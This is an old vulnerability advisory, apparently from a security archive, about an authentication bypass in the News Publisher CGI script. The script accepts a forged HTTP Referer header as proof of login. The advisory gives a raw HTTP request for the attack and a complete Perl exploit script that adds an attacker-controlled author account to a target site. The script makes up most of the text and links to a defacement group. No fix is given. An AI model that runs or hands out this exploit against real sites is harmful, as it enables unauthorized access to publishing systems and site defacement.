COMMAND

    News Publisher

SYSTEMS AFFECTED

    News Publisher CGI

PROBLEM

    'n30'  found  following.   Yet  again  CGI  authors  use nested IF
    statements  to  decide  what  action  to  take  upon  and incoming
    request.  This time the problem allows ppl to add and author  into
    the 'authors.file' file.  This can't be done through a web browser
    since the  script assumes  that if  the HTTP_REFERER  field is the
    URL of the  news.cgi script (the  main script) then  you must have
    completed the login process.  This assumtion would be true if  you
    were  to  use  a  browser  but....  its  easily fixed using netcat
    therefore by passing this raw HTTP request:

        POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
        Connection: close
        User-Agent: n30/browser
        Host: www.speedy3d.com
        Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
        Content-type: application/x-www-form-urlencoded
        Content-length: 71

        author=n30&apassword=teapot&email=don@know.com&name=n30&password=teapot

    it is possible to add an author.

    Below is a perl script that will add a user into the  authors.file
    for you with username: kid and the passwerd of your choice.

    This is  a real  problem since  on older  versions the author.file
    was readable with  Unix crypt passes,  this hole sorta  blows that
    outta the water!  There are many sites using this script and  some
    would probably be regarded as large.  Therefore NOT to misuse  the
    exploit script!!!

    #!/usr/bin/perl
    #
    # News Publisher EXPLOIT by n30
    # Versions: tested on 1.05
    #		      1.05a
    #		      1.05b
    #           	      1.06
    # Bug Found By: me {n30}
    # OS: Unix and Winnt
    #
    # The Problem:
    #	The author decided in all his 'enlightened wisdom'
    # that if the HTTP_REFERER url is the same as the News Publisher
    # news.cgi file. Then U have OBVIOUSLY logged in?
    #
    # Exploit:
    #	hmmm me thinks i should change the HTTP_REFERER to:
    #
    #	http://www.server.com/cgi/news.cgi
    #
    #	Using this exploit will add an author account with user kid
    #	and passwerd of ur choice.
    #
    # NOTE: There are more inventive ways to use this Vulnerability :)
    #	ie. maybe?? the Admin screen is protected by the HTTP_REFERER?
    #
    # n30@alldas.de
    # www.alldas.de, defaced.alldas.de {trib's the webmaster not me!}
    #
    # Shoutz: trib, axess, domz, acidflame, raxie,  and all who know me!
    #
    
    use strict;
    use Socket;
    
    print("\nNews Publisher EXPLOIT\n");
    print("By: n30 {n30\@alldas.de}\n");
    print("\nShoutz: trib, axess, domz, acidflame, raxie\n");
    
    if (@ARGV < 3) {
        print("\nUsage: $0 <target> <dir> <newpass>\n");
        print("\n   eg => ./sploit.pl www.example.com cgi-bin/news.cgi iisalamer\n");
        exit(1);
    }
    
    (my $target,my $dir,my $newpass) = @ARGV;
    
    # Setup Content-Length Header :)
    my $length = 68 + (2 * length($newpass));
    
    # Print BullShit
    print("\nRemote host: $target\n");
    print("CGI-script: $dir\n");
    print("URL: http://$target/$dir\n");
    
    # Setup URL Command
    my $url = "author=kid&apassword=$newpass&email=lamerz\@antionline.com&name=kid&password=$newpass";
    print("URL Command: $url\n");
    # Necessary to DE-Kiddie da werld :)
    my $agent = "-=Attention Admin=- pLz n0te d0wn th1s IP and P4ss ont0 fBi";
    
    my $sploit=
    "POST /$dir?addAuthor HTTP/1.0
    Connection: close
    User-Agent: $agent
    Host: $target
    Referer: http://$target/$dir
    Content-type: application/x-www-form-urlencoded
    Content-length: $length
    
    $url";
    
    my $iaddr = inet_aton($target)                     || die("Error: $!\n");
    my $paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
    my $proto = getprotobyname('tcp')                  || die("Error: $!\n");
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
    connect(SOCKET, $paddr)                         || die("Error: $!\n");
    send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
    close(SOCKET);
    
    print("\nWh0a chex0r: http://$target/$dir\nuser/pass: kid/$newpass\n");
    
    exit(0);

SOLUTION

    Nothing yet.